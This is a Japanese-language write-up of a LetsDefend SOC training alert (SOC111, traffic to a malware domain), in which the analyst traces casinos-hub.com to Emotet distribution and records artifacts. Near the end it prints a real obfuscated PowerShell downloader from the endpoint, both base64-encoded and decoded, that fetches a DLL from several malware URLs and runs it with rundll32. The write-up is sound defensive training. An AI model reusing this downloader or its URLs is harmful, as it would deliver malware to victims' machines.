LetsDefend level 1 alert SOC111 - Traffic to Malware Domain event-id 42
Details
EventID: 42
Event Time: Jan. 30, 2021, 5:25 p.m.
Rule: SOC111 - Traffic to Malware Domain
Level: Security Analyst
Source Address 172.16.17.19
Source Hostname BellaPRD
Destination Address 45.80.181.51
Destination Hostname casinos-hub[.]com
Username Bella
Request URL http[:]//casinos-hub.com/s/ZQhDyLF/
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action Blocked
playbook
Search Log
まずはアクセス先のIPの確認を行う。
45.80.181.51
VirusTotal: https://www.virustotal.com/gui/ip-address/45.80.181.51
ip-sc : https://ip-sc.net/ja/r/45.80.181.51
シンガポールの特に脅威として判定されていないIPである。
しかしドメインの方は、
casinos-hub[.]com
VirusTotal: https://www.virustotal.com/gui/domain/casinos-hub.com
URLhaus: https://urlhaus.abuse.ch/url/972700/
Emotet!
urlscan.io: https://urlscan.io/result/9df2f694-639e-4f89-99d6-48ef765c4cb7/
カジノhub?がemotetを配信していたようだ。つまりこれが、今回のアラートのTraffic to Malware Domainとなる。
ここに接続した後にどうなるかは分からなかった。
Log search - 45.80.181.51
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
335 | Jan, 30, 2021, 05:25 PM | Proxy | 172.16.17.19 | 13212 | 45.80.181.51 | 80 |
ログにはアラートが上がった時のアクセスのみ。
URL: http://casinos-hub.com/s/ZQhDyLF/ Device Actiov: Blocked
Analyze URL Address
先ほどemotetだと分かってしまったので
Answer :Malicious
Has Anyone Accessed IP/URL/Domain?
アクセスはブロックされた
Device Action Blocked
Answer: Not Accessed
Add Artifacts
Value | Type | Comment |
---|---|---|
45.80.181.51 | IP Address | casinos-hub[.]com in singapore |
http[:]//casinos-hub.com/s/ZQhDyLF/ | URL Address | emotet download |
ちなみに、
Endpoint - BellaPRD
Process Historyから怪しいpowershellスクリプトの実行が見られた。
powershell -w hidden -enc IAAgAHMAZQBUAC0ASQBUAEUAbQAgACgAJwBWAEEAUgBpAEEAQgAnACsAJwBMAEUAOgAnACsAJwBVAGUAQgA1AHAAJwApACAAIAAoACAAIABbAFQAeQBQAGUAXQAoACIAewAwAH0AewA0AH0AewA1AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AIgAtAEYAIAAnAHMAJwAsACcAZABpACcALAAnAE8ALgAnACwAJwByAEUAYwB0ACcALAAnAFkAcwBUAEUAJwAsACcATQAuAGkAJwAsACcATwByAHkAJwApACkAOwAgACAAJABYAHYAMAA1AGIAZQAgACAAPQAgACAAWwB0AFkAUABFAF0AKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsANQB9AHsANgB9AHsAMAB9AHsAMgB9AHsANwB9ACIAIAAtAGYAIAAnAGkAYwBFAHAAbwBpAG4AJwAsACcAbgAnACwAJwBUAG0AYQBOAEEAJwAsACcAZQAnACwAJwBzAFkAcwBUAGUAbQAuACcALAAnAFQALgBTACcALAAnAGUAUgBWACcALAAnAEcAZQBSACcAKQAgADsAIAAkAFAAdQBkAGIAdAA2ADcAPQAkAEgAXwA5AEoAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMAA3AEwAOwAkAEQAMQA5AFEAPQAoACcAWgAnACsAKAAnADEAOAAnACsAJwBGACcAKQApADsAIAAoAFYAYQBSAEkAYQBCAEwAZQAgACgAJwB1AGUAQgA1ACcAKwAnAHAAJwApACAAIAAtAHYAQQBMAHUARQBPACAAKQA6ADoAIgBDAHIAYABlAGAAQQBgAFQARQBgAGQASQByAGUAYwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBaADcAJwArACcAQgAnACsAJwBBAGEANwBqAGYAeABqACcAKQArACcAWgAnACsAKAAnADcAQgAnACsAJwBQAHcAcQByACcAKwAnADMAZAAnACsAJwAwAFoANwAnACkAKwAnAEIAJwApAC4AIgByAGUAYABwAEwAQQBjAGUAIgAoACgAJwBaADcAJwArACcAQgAnACkALAAnAFwAJwApACkAKQA7ACQARAAwADQARQA9ACgAJwBUADIAJwArACcAOABYACcAKQA7ACAAIAAoACAAIABjAEgAaQBsAEQASQBUAEUAbQAgACgAIgB2ACIAKwAiAEEAcgBJAGEAQgBMAEUAOgBYAFYAIgArACIAMAAiACsAIgA1AEIAZQAiACkAIAApAC4AVgBhAEwAVQBlADoAOgAiAFMAYABFAEMAVQBSAGkAVABgAFkAUABSAGAAbwB0AG8AYABDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbABzACcAKwAnADEAMgAnACkAKQA7ACQARgA2ADcATwA9ACgAJwBOACcAKwAoACcAMgA2ACcAKwAnAEoAJwApACkAOwAkAFYAOAB4AGoAdQBiAGYAIAA9ACAAKAAnAEUAJwArACgAJwA0ACcAKwAnADAAVAAnACkAKQA7ACQARwAyAF8AUAA9ACgAJwBMADEAJwArACcAMABMACcAKQA7ACQAWQB0AG4AMgB2ADYAegA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9AEEAJwArACcAYQA3AGoAZgB4AGoAewAwAH0AUAAnACsAJwB3AHEAcgAzAGQAMAB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgACAAWwBDAGgAYQBSAF0AOQAyACkAKwAkAFYAOAB4AGoAdQBiAGYAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAEsAOAA3AE4APQAoACcARAAnACsAKAAnADMAJwArACcAOABWACcAKQApADsAJABWAGUAegAzAGoAbQBjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAVQBrAGUAawBuAG8AbQA9ACgAKAAnAHMAZwAnACsAJwAgAHkAdwAgAGEAJwApACsAKAAnAGgAOgAvACcAKwAnAC8AeQAnACkAKwAoACcAYQBoACcAKwAnAHkAYQBsACcAKQArACcAaQBzACcAKwAoACcAYQAnACsAJwB5AGEAbQAuACcAKQArACgAJwBjAG8AbQAvAHMAeQAnACsAJwBzAC0AYwAnACsAJwBhAGMAJwApACsAJwBoAGUAJwArACgAJwAvAHQAQQBzAHcALwAhACcAKwAnAHMAJwArACcAZwAnACkAKwAoACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvAGMAYQBzACcAKwAnAGkAJwArACcAbgBvAHMALQBoACcAKwAnAHUAYgAnACsAJwAuAGMAbwAnACsAJwBtAC8AcwAvACcAKwAnAFoAJwApACsAKAAnAFEAaABEAHkAJwArACcATABGAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoADoALwAvAGQAJwArACcAZQBvAGQAaQAnACkAKwAoACcAdABhACcAKwAnAHMAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAC8AbgAvAEYAVQBFACcAKQArACgAJwB5AG8ARwAvACEAcwAnACsAJwBnACAAJwApACsAKAAnAHkAdwAgACcAKwAnAGEAaAAnACkAKwAoACcAOgAvACcAKwAnAC8AbQAnACsAJwB0AHMAMgAwADEAOQAtADAAMAAnACkAKwAnADIALQAnACsAJwBzAGkAJwArACgAJwB0AGUAJwArACcAOQAuAGcAdABlACcAKwAnAG0AcAAnACkAKwAoACcAdQAnACsAJwByAGwALgBjACcAKQArACcAbwBtACcAKwAoACcALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGMAbwAnACsAKAAnAG4AdAAnACsAJwBlAG4AdAAvAEUAJwArACcALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIAAnACsAJwBhAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAG8AJwArACgAJwBjAGUAJwArACcAYQBuADQAZwBhAG0AZQByACcAKwAnAHMALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwB3AHAALQBjAG8AJwApACsAKAAnAG4AJwArACcAdABlAG4AdAAvAEcAQQAnACkAKwAoACcAdQBZACcAKwAnAGYALwAnACkAKwAnACEAJwArACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAoACcAYQBoADoALwAvAGEAYwBhAGQAJwArACcAZQBtAGkAJwArACcAYQAnACkAKwAoACcAcAByACcAKwAnAG8AZwByACcAKwAnAGUAJwApACsAJwBzAG8AJwArACgAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AYwBnACcAKQArACgAJwBpACcAKwAnAC0AYgAnACkAKwAoACcAaQBuAC8AWgA1AC8AJwArACcAIQAnACsAJwBzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAJwArACcAOgAvACcAKQArACgAJwAvAG4AZQB3AHQAbwAnACsAJwBwACcAKwAnAC4AbwBuAGUAJwApACsAKAAnAC8AcgAnACsAJwBlAHMAJwApACsAKAAnAHAAJwArACcAbwBuAHMAaQB2AGUAJwApACsAKAAnAHMAJwArACcALwB6AC8AJwApACkALgAiAHIAYABFAHAATABBAGAAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAAnACkAKwAnAHkAJwArACgAJwB3ACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABWAGUAegAzAGoAbQBjACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAcABsAGAASQBUACIAKAAkAFAANQAzAFcAIAArACAAJABQAHUAZABiAHQANgA3ACAAKwAgACQAVwA2ADQATgApADsAJABWADEANgBTAD0AKAAnAFAAJwArACgAJwAzADEAJwArACcATAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwBwAHAAdgBzAGoAYwAgAGkAbgAgACQAVQBrAGUAawBuAG8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AHMAVABlAG0ALgBuAGUAdAAuAFcARQBCAEMAbABJAEUATgBUACkALgAiAGQATwBXAGAATgBsAGAATwBhAGQAZgBgAGkAbABlACIAKAAkAE8AcABwAHYAcwBqAGMALAAgACQAWQB0AG4AMgB2ADYAegApADsAJABFADgAMgBFAD0AKAAnAFYAJwArACgAJwA2ACcAKwAnAF8ATwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABZAHQAbgAyAHYANgB6ACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAANAAxADMAOAA1ACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbAAnACsAJwBsADMAMgAnACkAIAAkAFkAdABuADIAdgA2AHoALAAoACgAJwBBACcAKwAnAG4AeQBTAHQAJwApACsAJwByACcAKwAoACcAaQAnACsAJwBuAGcAJwApACkALgAiAFQAYABvAHMAYABUAFIAaQBOAGcAIgAoACkAOwAkAFEAXwA3AFcAPQAoACcAWQAxACcAKwAnADIATwAnACkAOwBiAHIAZQBhAGsAOwAkAFMANAAxAE8APQAoACcARQAnACsAKAAnADAAJwArACcAMABGACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEADMAOABaAD0AKAAoACcASAAxACcAKwAnADYAJwApACsAJwBRACcAKQA=
-> base64 decode
seT-ITEm ('VARiAB'+'LE:'+'UeB5p') ( [TyPe]("{0}{4}{5}{2}{1}{3}{6}"-F 's','di','O.','rEct','YsTE','M.i','Ory')); $Xv05be = [tYPE]("{4}{1}{3}{5}{6}{0}{2}{7}" -f 'icEpoin','n','TmaNA','e','sYsTem.','T.S','eRV','GeR') ; $Pudbt67=$H_9J + [char](33) + $H07L;$D19Q=('Z'+('18'+'F')); (VaRIaBLe ('ueB5'+'p') -vALuEO )::"Cr`e`A`TE`dIrecTOry"($HOME + ((('Z7'+'B'+'Aa7jfxj')+'Z'+('7B'+'Pwqr'+'3d'+'0Z7')+'B')."re`pLAce"(('Z7'+'B'),'\')));$D04E=('T2'+'8X'); ( cHilDITEm ("v"+"ArIaBLE:XV"+"0"+"5Be") ).VaLUe::"S`ECURiT`YPR`oto`COL" = ('T'+('ls'+'12'));$F67O=('N'+('26'+'J'));$V8xjubf = ('E'+('4'+'0T'));$G2_P=('L1'+'0L');$Ytn2v6z=$HOME+(('{'+'0'+'}A'+'a7jfxj{0}P'+'wqr3d0{'+'0}') -f [ChaR]92)+$V8xjubf+'.d' + 'll';$K87N=('D'+('3'+'8V'));$Vez3jmc='h' + 'tt' + 'p';$Ukeknom=(('sg'+' yw a')+('h:/'+'/y')+('ah'+'yal')+'is'+('a'+'yam.')+('com/sy'+'s-c'+'ac')+'he'+('/tAsw/!'+'s'+'g')+(' y'+'w ah:')+('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')+('QhDy'+'LF/!'+'sg y')+('w'+' ah://d'+'eodi')+('ta'+'s')+('.c'+'o')+('m'+'/n/FUE')+('yoG/!s'+'g ')+('yw '+'ah')+(':/'+'/m'+'ts2019-00')+'2-'+'si'+('te'+'9.gte'+'mp')+('u'+'rl.c')+'om'+('/w'+'p')+'-'+'co'+('nt'+'ent/E'+'/')+'!'+'s'+'g'+(' yw '+'ah'+'s://')+'o'+('ce'+'an4gamer'+'s.'+'co')+('m'+'/wp-co')+('n'+'tent/GA')+('uY'+'f/')+'!'+('sg '+'yw ')+('ah://acad'+'emi'+'a')+('pr'+'ogr'+'e')+'so'+('.'+'c'+'om/cg')+('i'+'-b')+('in/Z5/'+'!'+'sg'+' ')+('yw'+' ahs'+':/')+('/newto'+'p'+'.one')+('/r'+'es')+('p'+'onsive')+('s'+'/z/'))."r`EpLA`ce"((('sg'+' ')+'y'+('w '+'ah')),([array]('nj','tr'),'yj','sc',$Vez3jmc,'wd')[3])."spl`IT"($P53W + $Pudbt67 + $W64N);$V16S=('P'+('31'+'L'));foreach ($Oppvsjc in $Ukeknom){try{(&('N'+'ew-Obje'+'ct') SysTem.net.WEBClIENT)."dOW`Nl`Oadf`ile"($Oppvsjc, $Ytn2v6z);$E82E=('V'+('6'+'_O'));If ((&('Get'+'-I'+'tem') $Ytn2v6z)."le`NgTh" -ge 41385) {.('rund'+'l'+'l32') $Ytn2v6z,(('A'+'nySt')+'r'+('i'+'ng'))."T`os`TRiNg"();$Q_7W=('Y1'+'2O');break;$S41O=('E'+('0'+'0F'))}}catch{}}$D38Z=(('H1'+'6')+'Q')
中身を見ると、
('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')
casinos-hub.comへのアクセスが見られる。このスクリプトの実行が今回のアラートに関連する。これが何が原因で実行されてのかは分からない。
Endpointの他のログを見ると、これ以降のログはあるがこれ以前の動きはログが無いために分からない。こういうのは大抵 vbaマクロですかね。
End
emotetのダウンロードを行ったpowershellの実行手段が分からなかったが、アラート単体で終わるものだけでなく前の繋がりが何となくイメージできたのは面白い。
ただ、可能であれば前後の繋がりもEndpoint等のログとして残して欲しい。
大量のログを残す、作るのは難しいからやっていないのかもしれませんが。